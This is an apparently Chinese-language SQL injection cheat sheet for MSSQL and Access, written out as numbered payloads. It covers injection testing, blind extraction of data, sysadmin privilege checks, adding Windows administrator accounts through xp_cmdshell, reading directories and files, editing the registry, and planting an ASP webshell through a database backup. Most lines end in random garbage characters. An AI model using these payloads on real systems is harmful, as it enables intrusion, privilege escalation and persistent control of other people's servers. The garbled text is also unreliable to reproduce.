1.判断是否有注入;and 1=1 ;and 1=2 iA:CPBv_mu
2.初步判断是否是mssql ;and user>0 BK�Gwi2]Ry
{}.��c.W+�
3.注入参数是字符'and [查询条件] and ''=' �Z{e5 �OJ
'SuYNA)���
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 1s��goT f%
J${wU�@_�%
5.判断数据库系统 *<9p88FpDU
�����3f�Gy
;and (select count(*) from sysobjects)>0 mssql ?.4u�'Dkn=
�Y#Hf\8r,d
;and (select count(*) from msysobjects)>0 access > sU��k6Z~
wi&m(�f(�~
}�g`A�*y;t
�JiRW|+`pe
6.猜数据库 ;and (select Count(*) from [数据库名])>0 {Xl
5F��.q
l�D�{�9o2
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 )���`�L!eN
� �Z3��I<�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ((H}d?�^AJ
/at#[Pw~01
9.(1)猜字段的ascii值(access) }U8H4B~UtY
JNZKzyJ9�K
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 R�^K<u#>K
aZmSC�i:&'
(2)猜字段的ascii值(mssql) 2Q�n%p[#�n
`B^?Za,x�N
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 VD�1*�br^,
K�������C�
10.测试权限结构(mssql) ^��^v\ T��
"F0,S~tZ�Z
hLBX�,r�)u
�}|x]8zL8G
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 6 Iup��4sP
d,$[633It}
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- V�ls*�fY:W
�U�m*{~=;u
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- M�34*$�>bk
����Z� �EG
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- u��<�)�:gI
k8w8I$Q�EM
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �Iy"���
�
y\�ouIsI77
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 9��6 C��|R
;N���i+TS�
;and 1=(select IS_MEMBER('db_owner'));-- b`�1�P%OjC
�h���v��9s
E4WoKuE1$�
@!K)(B;A0b
11.添加mssql和系统的帐户 �A/�GEDG
?
]x~��H"<V
;exec master.dbo.sp_addlogin username;-- _<�xU"8b"5
;exec master.dbo.sp_password null,username,password;-- xH*�OE��zN
��lQ@�2s[
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- c~p4M64��
R$v{� p[��
;exec master.dbo.xp_cmdshell 'net user username password [<bf�wTFsl
)=�8X[<^i�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ���_4�.fT
j�#�o0y�5S
;exec master.dbo.xp_cmdshell 'net user username password /add';-- qA&N�6�`��
'�%)7�%O,2
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- c�l^�tX�%�
�c6�Wy1d�^
N=�-hXg�X^
e �P�lEd'Z
12.(1)遍历目录 �)�(y&�U��
�bp;���)�*
;create table dirs(paths varchar(100), id int) N!$y`nwiw'
IaN|��S|n~
;insert dirs exec master.dbo.xp_dirtree 'c:\' ,p0R���4gi
/G\�-v2i�D
;and (select top 1 paths from dirs)>0 % ��&{>oEQ
trg�+�"�)a
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) p��b�AQ�f3
*�O+Yho�R?
evZ�{~v&�/
x1wm�]|BIf
(2)遍历目录 1��vi<@i�,
0�E{��$u��
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ����P|c7�9
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 _ 4pBJOJQ6
CShVJ:u+K\
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 \O`B@!d�a~
hE+6�z%A8�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 %I[�(`�nb�
.-fJ\`^m�i
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 k$��#�
@_�
��#�;>�J<>
uB0/H=<�H�
�y~''r%]��
13.mssql中的存储过程 NSj�}�?h�z
g�,mc�xX�O
xp_regenumvalues 注册表根键, 子键 wbVM'E��/&
Z�=4Krf�n�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ,.G6c�=pZ�
�`�d�Ml5�b
xp_regread 根键,子键,键值名 c��Kdy)T%;
YtE V8w_$
;exec xp_regread M'Q�{2%:>a
7[^:�[�OEE
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 q�Ft%{~a
S
��}yC�� ve
xp_regwrite 根键,子键, 值名, 值类型, 值 ^pA�qe8u_
kR9G;IZ�8s
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �2�r<U�Y�B
K4snp�u�hC
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 &K�X|�gB'�
vD^^0-P�k6
xp_regdeletevalue 根键,子键,值名 �5f��SDdaO
6D6=��5!l�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �>��J��|I
uX�yNj2(d.
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 |l�`X]dsfQ
R84��g�<��
2-. ��g>'W
}�m��k9�-7
14.mssql的backup创建webshell f�w'�$HV76
Nh�S�0D=v6
use model ~`u?|+*BO�
c-n��'F+fZ
create table cmd(str image); ^s��_E�|~U
_|x�%M}O},
insert into cmd(str) values (''); ��%t�`a�-m
h�Q#�'_%:
backup database model to disk='c:\l.asp'; �.���9���S
s=u0M;A0�Q
S�\M�D]>�4
r�mk'{��"�
15.mssql内置函数 R1\c�AP^�0
Y:ZI��9JK?
;and (select @@version)>0 获得Windows的版本号 X_��!S���m
;xXHSxa:=W
;and user_name()='dbo' 判断当前系统的连接用户是不是sa b8feo'4Z �
�#AF��r@n�
;and (select user_name())>0 爆当前系统的连接用户 0+m"eGw�Tm
�(<=qW_i�W
;and (select db_name())>0 得到当前连接的数据库 Z�Z)bTLu��
#$e~�o}(r
*���Iy�v${
O�h5(8�.<y
16.简洁的webshell =3���}@\f#
{�y)�s85:t
use model B�m;�{d�O�
X�Gk8K�i3w
create table cmd(str image); dPPe_% Ilr
XK��{�`�x<
insert into cmd(str) values (''); [�`y�iD��>
P�Ql�G�!��
backup database model to disk='g:\wwwtest\l.asp';
